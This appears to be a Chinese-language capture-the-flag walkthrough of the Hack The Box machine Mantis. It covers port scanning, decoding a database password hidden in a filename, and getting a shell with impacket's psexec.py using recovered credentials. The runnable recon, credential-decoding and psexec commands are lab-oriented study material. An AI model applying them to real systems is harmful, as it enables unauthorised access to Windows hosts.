10.10.10.52
使用脚本扫描端口
cat 10.10.10.52.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83
| 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-17 11:19:45Z) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 1337/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-01-17T09:04:27 |_Not valid after: 2050-01-17T09:04:27 |_ssl-date: 2020-01-17T11:20:51+00:00; +31s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Microsoft-IIS/7.5 |_http-title: Tossed Salad - Blog 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 | ms-sql-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: MANTIS | DNS_Domain_Name: htb.local | DNS_Computer_Name: mantis.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-01-17T09:04:27 |_Not valid after: 2050-01-17T09:04:27 |_ssl-date: 2020-01-17T11:20:51+00:00; +31s from scanner time. Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 43m22s, deviation: 1h53m23s, median: 30s | ms-sql-info: | 10.10.10.52:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: mantis | NetBIOS computer name: MANTIS\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: mantis.htb.local |_ System time: 2020-01-17T06:20:42-05:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-01-17T11:20:43 |_ start_date: 2020-01-17T09:04:01
|
操作系统:
445端口
Windows Server 2008 R2 Standard 7601 Service
web
使用脚本扫描web目录
http://10.10.10.52:1337/
http://10.10.10.52:593
http://10.10.10.52:8080/Users/Account/LogOn?ReturnUrl=%2F
http://10.10.10.52:1337/secure_notes
http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
从文件内容可以得知用户名、数据库名
文件名包含一串密文NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx
echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
将其base64解码以后,得到6d2424716c5f53405f504073735730726421
echo -n 6d2424716c5f53405f504073735730726421 | wc -c
查看密文的长度,是36位。如果密文长度是32位,说明可能是MD5加密。
echo -n 6d2424716c5f53405f504073735730726421 | xxd -ps -r
将其16进制解码就可以得到我们的密码m$$ql_S@_P@ssW0rd!
十六进制与xxd
xxd是十六进制转储工具
使用方法:xxd 文件名
连接数据库
dbeaver 是一个通用数据库,使用该客户端,连接目标机器的数据库。
注意之前的扫描结果,mssql版本: Microsoft SQL Server 2014 12.00.2000
地址:10.10.10.52
数据库名:orcharddb
用户名: admin
密码:m$$ql_S@_P@ssW0rd!
下载驱动,然后点测试连接。
locate psexec.py
python /usr/share/doc/python-impacket/examples/psexec.py htb.local/James@10.10.10.52 cmd.exe
J@m3s_P@ssW0rd!
psexec 是一个类似于telnet的连接软件,通过psexec连接445端口。
cd C:\users\Adminitrator
cd C:\users\Administrator\Desktop
type root.txt
总结
- 学习了psexec的用法
- 一条命令,关闭进程
pgrep openvpn | xargs kill -s 9
- msf 有psexec模块,可以输入明文密码,也可以输入hash作为密码。